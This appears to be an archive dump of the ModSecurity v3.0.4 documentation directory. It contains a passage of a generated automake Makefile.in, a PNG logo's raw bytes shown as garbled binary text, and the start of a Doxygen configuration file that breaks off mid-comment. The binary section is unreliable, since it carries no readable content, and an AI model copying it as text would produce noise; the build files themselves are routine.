'$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ subdir = doc ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = SOURCES = DIST_SOURCES = am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) am__DIST_COMMON = $(srcdir)/Makefile.in DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ ACLOCAL_AMFLAGS = -I build # Doxygen support # include $(top_srcdir)/build/ax_prog_doxygen.m4 # distribution of the Doxygen configuration file EXTRA_DIST = \ doxygen.cfg MAINTAINERCLEANFILES = \ Makefile.in \ doxygen_sqlite3.db \ html \ latex all: all-am .SUFFIXES: $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign doc/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign doc/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs tags TAGS: ctags CTAGS: cscope cscopelist: distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done check-am: all-am check: check-am all-am: Makefile installdirs: install: install-am install-exec: install-exec-am install-data: install-data-am uninstall: uninstall-am install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-am install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-am clean-am: clean-generic clean-libtool mostlyclean-am distclean: distclean-am -rm -f Makefile distclean-am: clean-am distclean-generic dvi: dvi-am dvi-am: html: html-am html-am: info: info-am info-am: install-data-am: install-dvi: install-dvi-am install-dvi-am: install-exec-am: install-html: install-html-am install-html-am: install-info: install-info-am install-info-am: install-man: install-pdf: install-pdf-am install-pdf-am: install-ps: install-ps-am install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-am -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-am mostlyclean-am: mostlyclean-generic mostlyclean-libtool pdf: pdf-am pdf-am: ps: ps-am ps-am: uninstall-am: .MAKE: install-am install-strip .PHONY: all all-am check check-am clean clean-generic clean-libtool \ cscopelist-am ctags-am distclean distclean-generic \ distclean-libtool distdir dvi dvi-am html html-am info info-am \ install install-am install-data install-data-am install-dvi \ install-dvi-am install-exec install-exec-am install-html \ install-html-am install-info install-info-am install-man \ install-pdf install-pdf-am install-ps install-ps-am \ install-strip installcheck installcheck-am installdirs \ maintainer-clean maintainer-clean-generic mostlyclean \ mostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \ tags-am uninstall uninstall-am .PRECIOUS: Makefile # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/doc/ms-doxygen-logo.png0000644000175000017500000002447313607066010021021 0ustar zimmerlezimmerlePNG  IHDRxxgAMA a cHRMz&u0`:pQ<bKGD(RIDATx}yu罷{%!BP h ,&b dۙʼn$3;'sL!vb8cdfNNMm! ,!hIl$@-u{Vի׭X3HOV~mM6&DhmM6&Dhma "203 !Bf ""f.w?(ưseYfso18҇C#51c bDT9cDFXD@X 'cvE]#v=!-?߶d"@z n^CD""A@NDҎP@1@V3R@P1XX L4DуD]By bxel" (D\ d) QRyeQNt9L`:$ #D:)wH i6?ζ ѯ=D0D8j4E)O "&cX8^ (97 TtFN*"P$QW[#t!"@ 6[fɟ'BlRCD`a@B"0i9% CeyQ8f ?! !7Jx`vny4xCVDv["*T  !UÂQqs(D<@ g Al$ Q5꫰2O0ցJ3ꈨ]2 0=啒xH4CSADE!""y(&* -LD 3RFM#&Ҧ}hƗorXBF$F̀Doc(,D@cUW0g"-P_Q\ht ‹5fia!D WB@Dsc^Z2*CJa$cudn`QmRe!)""¨xtU'IF%䬼@ Q 7< XCt"5!cqyC1fQf 1ZF%""%"}&wy4/"` kx~ogfADNd7AUgȐٵz#a0sfMgZNPRylUlSp +mbAD Y--?]bݽ0̄h* *-Q;(̌%IDX,dZ)Q!`}@wֶ"]4jVXd'Zf֖ǚ=] 0_PàxfPEK|#`Z,{̊HJZs* bCƐ+qdL*iZӴڰ;HAU@Y_ufoCQ!^Wp%2pH!"f"67!T2CjsƔl&1EJ)9.@X+s@*?A]8f"P֒C錔A4YcU9PUSͬ( ȋ"{VɔXkYD5xrnOE"'g!DI|h0 !Y@!c'A"=Qff8Vh"j~5X̕JL(3+TUV@KB44Von+Pvtn4@;fCc',Y78D|sgP"T2ZJREo'YfJgYf kbiju"QOKLCXX{Z" -wΉ ʧ+@*_af1D8hLhй(ȤA"""@V+)'C9sXʲ,@DE %D6QuJkݹ, "`ısД WuBժAO, W+\VWRUDQ0ưjQqBʲLC'fQ8](11DD@ >vhkQáLhdA0D3`GDJG π2W?I|ĘٌYQF=UzT+"vj%oM];Ȕ kcׄowm .Ù;8LS( 0x-BVE:WT{*=bY|3k;~|IXHiVQiWV'/^7` ":f4WR(<7DP s=H Emf+*լ{AT*̜y49/ dͨT[u(ίhf$(l_( zRyk$t ,3W*Unȗ!wRE%˲,UBDgR@DP|\}в9TjZ'pEٙ`YCX٩_. z= Mʢp}}}՞jn2hE(ln,眚Du-Eu;q 8+: N|+Nd3.-8؊̈́p. ۧX-t&oCƱ7V+檜%01FQNz-ʠzzzPhLNDKhb !P!19uTPCG8u"$!f1y^@LoJqeAEAUD`feZ-S$y1ƐIFKh4&O4mƴ,;Vy#f"EWB[K, yxɲ}{TSfܘxTLG¨Y3Weͻ/z/$|lm[T{P44h4!ܹoZz饫VY?y3f̘4yJZ%D|dxxpS30/d6sܒ vhk )-;&B$\dgs: 3Vr&a KV˲R\j?ٞ1|y-om4Xrժwg7opΝ8qbG_O=3^xWN ;猵fϝ|+\KKfUO?}nЩl.;~YfYף{=zЍ3N&q9F[|e]ߪpE!sfF@eS.h 7tXc-"E ik^{_z_?ݾ!],lh+ɓOǾFFF҇g}݆ 6x &h1wiO:uu鋥~XQ[$o4+y,3+k6T*r3ّ/Ot3~;;NyԩwTdM۵K&F-3;HFS70iҤb^R qQCy3gL=;88t\Q1WZ]fmzvΝ^$R:l7j#W~M7ݴt$ #\wk{U2 ɐ]y'K+yɔ5 Ȫc-L4iMJ&86s"UPӦۢ͞fVC^>rș3gwYۥhJ~#3|k/ӌ nev'CZ{̙{\zѢEy#`(ް^{݆v_|Q[Zz>@H3O21*#v1ƚbk(l|,To48Qϝ;w C)bڴiktד8vڬSG&$`ӯtM˗kis"JE7O ְT[uta =Hd*];Ϝ9SeM7U=^nLK¼|yJO۵cG7t!ST4&088g` =xԧ.\ٲ5 ZRטCv$ݔɘNyXh ;R4w|\yDivhszhKFg|7Q)f.\R:s (Szr]&lYԌ=N_oĦ۟KhβlӍ7ib#3/_HzgΜYtvZDΞ#JjڗZ/O/rEo|mG~}{x| ?) BZvS6DJ,qŻޢxw`ر ,LYg?v4cZ6Lʢwl>ګа2DT}3G|( -Zh?Zvرۿw?ǎ 5(Y#/B1gt=!֨ww9DG%,]z+=dѲsXܤIXv$9rd2FGEQ4jy];7W?뷽IگGK,^V^ys޵';ۻӡj~?^Zut>f0###۶ny;ߕ ލ7xߏMb7/⪫J?{ѣGQv^+Y>Jr?~;>tͺLc===/?[zg?={4f1yȯ&  u*S^MsǺ ';vCCW[7f~vۚՃ "Zu5 ͳ?敫W|]K~˾IV^z¿~o'ܧ`fGdczY3 .$ЄԾ|ƒ3p-WWlfpM5x=HD΍J5i^G}jmȶm3f_q5kV\c>k_Gr-___{ddcCޙmftD 3Ν{xSLaӍ۶na5g6pC/渌%lfH <1TWN}u]f%/I_'N??"ǂ]ںXk|X6$MD^xg)_޿bɒ3۸RfȩW^ym,B>ǹsPwιũR.DdU?wl??=kgɗ+k\QBqwЩY6w>qxxm[KgL~UW^sM쾽{{ٰ?GȘdh:C+4.^ʆ0t`|o?/Ξ=^pԵBdA.ΉHᜀХfNGm+ Xz͚Jly%KJwmAuQ3Tƚ<ύ,R"I 7va YkO?;/Yӳ7孳f͎Q IٱAxs|;"'F ńYp=upK}M{7|ٺ̙3D9cz5df&o4 sݎWfwODl4E,Mt]PΫHI@"zrZ}`ܹmΝ۶erzݎ*zL<2cƌi/]e=T{[r$ED|О=a{E/i QH488n%;g_G;/>_;V}&͞=g޼y,YpɓK]/w V/6[z4-8Xٺwݏ:zɬ"kSX(#?zO=Ul}}}+V8v8qo[m 8Tx f;(خ'OӺ=mkVS%B5(-q̪?ёÇ?l_/fM6<4C/ؾ(ڥma,$ {ND__z}{̹-cea.GZ ¬*ʈhxx_o~[nvŕWM>Xu8r>t[Zu %n^7md Bh"rX;>!k3_d-}?w玟cB597lqu0l`'_~~H-Vw|KwTTF;vߏR6%"jE^}e_x3fN272$d漑;w^;v/۳wC_ QW)'5gϝqU PNJ`Ӑ*Rk0T^LJfMjCTT+J2uT$b'DqjF}ppFF#Z;hB 'hh+Zyh͍ߐTI31RwI anTBaz~I$NsVsїuj]Z @-hSPxB"w,"S[CM dSJԙr|qhTeHo<@W94Chu)lҋH9g "5DF#s-g2 qN+x(OK+v Xү/lJ#m>_+މ()./#RD?_g\*MS10 8W2"$iC;.|~J@ ؁0I~`KJ&}Y*ԴbnCDD\>Vn-ǔ6ZR) !UuIS+DR.ny2!2;;"Pq"pΗ! 3Id%DofxNoi+!(`:-ꈎ1&NaC&;\?[F^Z1%a.6WK\ƴX`n TÐ. ۚLPX$DzҕMR?v, <%RK꽿!SFM"7Fc h=OӮC vfo6+I]Np [ W*㔨M·-*T!Nw`CPwTP&# (C]їJD(c3EQ kʑE8Ի)h (n~IuT|yuz7#jƀSG XW h%Sb]`}eMGZu[8 *뤹=mئ7USoT c0Ҋ>%n*Hj1)#_)$%R:1~AZJ  C-_5&%8\AMz}F"6z2(s@|#^%GaFW6?~>R_rLrYn&F [ZEffzXtQĀHP-/!u?+M}]RZ AXh:Unuwx-X]amC%D#Cq UR_1gWBcyG H4>U0L]`񻼭 Sa뎋hZ+P$w",)ơ卼M(i*5$2]Adri ,N1&FE\QxO4&S+I8p(6]kJ9֒:C &蒈Qf uz)dBRJ'ILEI\SB7-)J7X{ is'@H1􉄪"JW0Y0Zn5.ch.8/1@$L'Hv!YGԘ$0mJ~DyIcJ% BS (i"w~ Kyo M6&DhmM6&Dhm<"2%tEXtdate:create2014-04-17T17:46:31+02:00j,%tEXtdate:modify2014-04-17T17:46:31+02:00jIENDB`modsecurity-v3.0.4/doc/doxygen.cfg0000644000175000017500000031477413607066010017427 0ustar zimmerlezimmerle# Doxyfile 1.8.8 # This file describes the settings to be used by the documentation system # doxygen (www.doxygen.org) for a project. # # All text after a double hash (##) is considered a comment and is placed in # front of the TAG it is preceding. # # All text after a single hash (#) is considered a comment and will be ignored. # The format is: # TAG = value [value, ...] # For lists, items can also be appended using: # TAG += value [value, ...] # Values that contain spaces should be placed between quotes (\" \"). #--------------------------------------------------------------------------- # Project related configuration options #--------------------------------------------------------------------------- # This tag specifies the encoding used for all characters in the config file # that follow. The default is UTF-8 which is also the encoding used for all text # before the first occurrence of this tag. Doxygen uses libiconv (or the iconv # built into libc) for the transcoding. See http://www.gnu.org/software/libiconv # for the list of possible encodings. # The default value is: UTF-8. DOXYFILE_ENCODING = UTF-8 # The PROJECT_NAME tag is a single word (or a sequence of words surrounded by # double-quotes, unless you are using Doxywizard) that should identify the # project for which the documentation is generated. This name is used in the # title of most generated pages and in a few other places. # The default value is: My Project. PROJECT_NAME = ModSecurty # The PROJECT_NUMBER tag can be used to enter a project or revision number. This # could be handy for archiving the generated documentation or if some version # control system is used. PROJECT_NUMBER = 3.0.0 # Using the PROJECT_BRIEF tag one can provide an optional one line description # for a project that appears at the top of each page and should give viewer a # quick idea about the purpose of the project. Keep the description short. PROJECT_BRIEF = "ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx that is developed by Trustwave's SpiderLabs. It has a robust event-based programming language which provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analys…" # With the PROJECT_LOGO tag one can specify an logo or icon that is included in # the documentation. The maximum height of the logo should not exceed 55 pixels # and the maximum width should not exceed 200 pixels. Doxygen will copy the logo # to the output directory. PROJECT_LOGO = doc/ms-doxygen-logo.png # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) path # into which the generated documentation will be written. If a relative path is # entered, it will be relative to the location where doxygen was started. If # left blank the current directory will be used. OUTPUT_DIRECTORY = ../doc # If the CREATE_SUBDIRS tag is set to YES, then doxygen will create 4096 sub- # directories (in 2 levels) under the output directory of each output format and # will distribute the generated files over these directories. Enabling this # option can be useful when feeding doxygen a huge amount of source files, where # putting all generated files in the same directory would otherwise causes # performance problems for the file system. # The default value is: NO. CREATE_SUBDIRS = NO # If the ALLOW_UNICODE_NAMES tag is set to YES, doxygen will allow non-ASCII # characters to appear in the names of generated files. If set to NO, non-ASCII # characters will be escaped, for example _xE3_x81_x84 will be used for Unicode # 